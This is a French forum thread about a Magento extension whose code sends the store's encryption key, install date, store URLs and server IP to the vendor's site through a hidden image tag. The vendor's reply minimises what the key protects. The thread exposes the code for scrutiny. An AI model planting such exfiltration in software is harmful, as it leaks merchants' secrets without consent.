Une bonne raison pour qu'un module accède à distance à global / crypt / key?

Pardonnez mon ignorance, mais la clé de cryptage est utilisée pour décrypter les données Magento, non? Y a-t-il une bonne raison pour qu'un module y accède? Je suis tombé sur ce code après avoir installé Advanced Content Manager ...

<div id="banana-tracker">
<?php
    $stores = Mage::app()->getStores();
    $key = (string)Mage::getConfig()->getNode('global/crypt/key');
    $date = (string)Mage::getConfig()->getNode('global/install/date');
    $serverIp = $_SERVER['SERVER_ADDR'];

    $params = 'key='.$key.'&date='.$date.'&';

    foreach($stores as $store)
    {
        $params .= 'store_'.$store->getCode().'='.urlencode(Mage::app()->getStore($store->getId())->getBaseUrl(Mage_Core_Model_Store::URL_TYPE_LINK)).'&';
    }
?>
<img src="http://www.advancedcontentmanager.com/images/distant/banana-tracker.gif?<?php echo $params; ?>time=<?php echo time(); ?>&serverip=<?php echo $serverIp; ?>" />

Oui ... il y a une bonne raison.
Ils veulent le savoir et l'enregistrer, au cas où. :)

Vous devez désinstaller l'extension (vous l'avez probablement déjà fait). Vous ne devez jamais utiliser d'extensions qui "téléphonent à la maison", quelles que soient les données envoyées à la maison.

Vous voudrez peut-être lister l'extension ici pour que les autres voient: Code drôle / inutile / horrible des extensions Magento

Nous avons reçu la demande d'assistance concernant cette fonctionnalité aujourd'hui. Nous l'avons déjà résolu et supprimons ce morceau de code. Une nouvelle version est disponible pour tous nos clients dans leur espace client (gratuitement, car nous proposons une mise à jour illimitée).

Je sais que nous devons justifier cela, alors faisons-le:

• Le but de ce tracker était UNIQUEMENT de suivre l'utilisation non autorisée de notre extension.
• Le tracker était uniquement affiché dans la zone d'administration (aucun de vos clients ou personne d'autre que vous et nous n'a pu le voir).
• Nous avons également supprimé cela dans notre base de données.
• La clé est uniquement de crypter votre mot de passe administrateur. Comme nous avons l'habitude de travailler avec vous tous par des demandes d'assistance, il se peut que vous ayez déjà envoyé vos informations d'identification par e-mail, pour obtenir de l'aide. Si nous voulions votre mot de passe, nous l'enverrions directement ... Ce n'était pas le but.
• Même avec la clé, votre mot de passe est toujours crypté. Et l'administrateur de magento bloque l'utilisateur après quelques tentatives.

Nous reconnaissons que c'est une erreur, et c'est la force du système communautaire et open source: nous pouvons réparer et améliorer beaucoup plus rapidement. Merci à tous de nous avoir alertés, nous ferons plus d'efforts sur la vulnérabilité maintenant.